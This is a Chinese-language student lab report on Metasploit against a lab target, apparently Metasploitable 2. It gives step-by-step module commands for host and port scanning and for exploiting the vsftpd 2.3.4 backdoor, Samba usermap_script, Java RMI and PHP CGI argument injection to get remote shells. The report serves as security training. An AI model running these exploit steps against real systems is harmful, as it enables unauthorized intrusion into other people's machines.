一、實驗內容
學習掌握了Metasploit工具的使用,具體的操作總結來說就是Search-Use-Show-Set-Exploit/run
學習了利用相關漏洞進行模擬攻擊的操作,對防範惡意攻擊有了一些認識(安裝殺軟,不要點選陌生網站、檔案連結等)
二、實驗過程
1、前期滲透
①主機發現(可用Aux中的arp_sweep,search一下就可以use)
首先su root
進入root,防止沒有許可權進行埠包檢測
!!!先要檢查主機能否ping通靶機
進入msfconsole
控制檯
使用search arp_sweep
進行搜尋
使用0號 use 0
後檢視所需引數show options
檢視靶機IP地址
設定靶機IPset rhosts 192.168.1.112
之後執行run
掃描到了靶機
②埠掃描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
利用Aux中的portscan/tcp,search portscan/tcp
,use 0
後show options
設定目的埠、靶機IP等引數後執行
掃描到了0-65535中的以下埠
③掃描目標HTTP伺服器的HTTP版本資訊
use auxiliary/scanner/http/http_version
show missing
set RHOST 192.168.1.112
run
2、Vsftpd原始碼包後門漏洞(21埠)
漏洞原理:在特定版本的vsftpd伺服器程式中,被人惡意植入程式碼,當使用者名稱以“😃”為結尾,伺服器就會在6200埠監聽,並且能夠執行任意程式碼。
利用步驟:
在kali中執行msfconsole 啟動metasploit
use exploit/unix/ftp/vsftpd_234_backdoor
選擇漏洞
set RHOST 192.168.1.112
(靶機IP)
run
開始攻擊,利用成功,執行uname –a、 pwd、 id等命令 驗證
3、SambaMS-RPC Shell命令注入漏洞(埠139)
漏洞原理:Samba中負責在SAM資料庫更新使用者口令的程式碼未經過濾便將使用者輸入傳輸給了/bin/sh。如果在呼叫smb.conf中定義的外部指令碼時,透過對/bin/sh的MS-RPC呼叫提交了惡意輸入的話,就可能允許攻擊者以nobody使用者的許可權執行任意命令。
use exploit/multi/samba/usermap_script
選擇漏洞
set RHOST 192.168.1.112
(靶機IP)
exploit 開始攻擊,執行uname–a驗證
4、Java RMI SERVER命令執行漏洞(1099埠)
漏洞原理:Java RMI Server的RMI登錄檔和RMI啟用服務的預設配置存在安全漏洞,可被利用導致程式碼執行。
根據前期掃描結果,靶機1099埠是開放的
然後在MSF中:
use exploit/multi/misc/java_rmi_server
show missing
檢視缺少的引數
set RHOST 192.168.1.112
(靶機IP)
exploit/run
執行成功
sessions -i 4
進如任務
shell
利用whoami
驗證下
5、PHP CGI引數執行注入漏洞(80埠)
漏洞原理:CGI指令碼沒有正確處理請求引數,導致原始碼洩露,允許遠端攻擊者在請求引數中插入執行命令。
根據前期掃描結果可知,靶機80埠是開放的
use exploit/multi/http/php_cgi_arg_injection
選擇漏洞,設定IP引數set RHOST 192.168.1.112
(靶機IP)
exploit/run 開始攻擊,進入shell
後輸入ls
檢視檔案
三、問題及解決方案
- 問題1:在主機發現是,執行結果為
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
即靶機不可達
- 問題1解決方案:經過測試,主機無法ping通靶機,隨後將靶機的網路介面卡從NAT改為和主機相同的
自定義-VMnet0
後發現可以ping通,主機掃描模組的執行結果也達到了預期
四、學習感悟、思考等
透過課後作業的不斷嘗試,已經熟悉了Metasploit的使用,總體來說就是
進入msfconsole
search 對應漏銅/掃描目的(主機、埠等)
use 對應的模組
show missing檢視缺少的引數(也可以用show options檢視所有的引數)
exploit/run進行執行
總體來說作業和實驗過程以及原理很好理解,主要是靶機的配置以及漏洞模組是否與靶機相匹配決定了最終執行是否能夠成功,從攻擊的角度來說Metasploit工具一定程度上提供了便利,從計算機使用者的角度來說,在日常學習生活中一定要警惕陌生的檔案、網站連結、配置好主機的安全策略,定時查殺病毒木馬,提高網路與系統安全防範意識。
參考資料
- Metasploitable 2 Exploitability Guide